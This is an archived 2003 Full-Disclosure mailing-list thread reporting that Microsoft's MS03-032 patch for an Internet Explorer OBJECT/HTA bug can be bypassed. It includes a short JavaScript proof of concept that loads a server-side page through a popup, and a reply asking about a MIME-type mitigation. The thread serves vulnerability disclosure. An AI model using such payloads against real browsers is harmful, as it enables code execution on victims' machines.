[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
RE: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032
- To: <full-disclosure@xxxxxxxxxxxxxxxx>
- Subject: RE: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032
- From: "Richard M. Smith" <rms@xxxxxxxxxxxxxxxxxxxx>
- Date: Sun, 7 Sep 2003 14:38:13 -0400
Can this bug also be fixed by changing the MIME type of HTA files from
"application/hta" to something else? If so, what other MIME types need
to switched to avoid the <OBJECT DATA=>? Any thoughts why .HTA files
have a MIME type in the first place?
Richard
-----Original Message-----
From: full-disclosure-admin@xxxxxxxxxxxxxxxx
[mailto:full-disclosure-admin@xxxxxxxxxxxxxxxx] On Behalf Of
http-equiv@xxxxxxxxxx
Sent: Sunday, September 07, 2003 9:17 AM
To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin
MS03-032
Since the cat somehow got out of the bag, and more importantly, this
is so blatantly obvious, herewith is the "Bad News":
The patch for Drew's object data=funky.hta doesn't work:
http://www.malware.com/badnews.html
<script>
var oPopup = window.createPopup();
function showPopup() {
oPopup.document.body.innerHTML = "<object data=ouch.php>";
oPopup.show(0,0,1,1,document.body);
}
showPopup()
</script>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html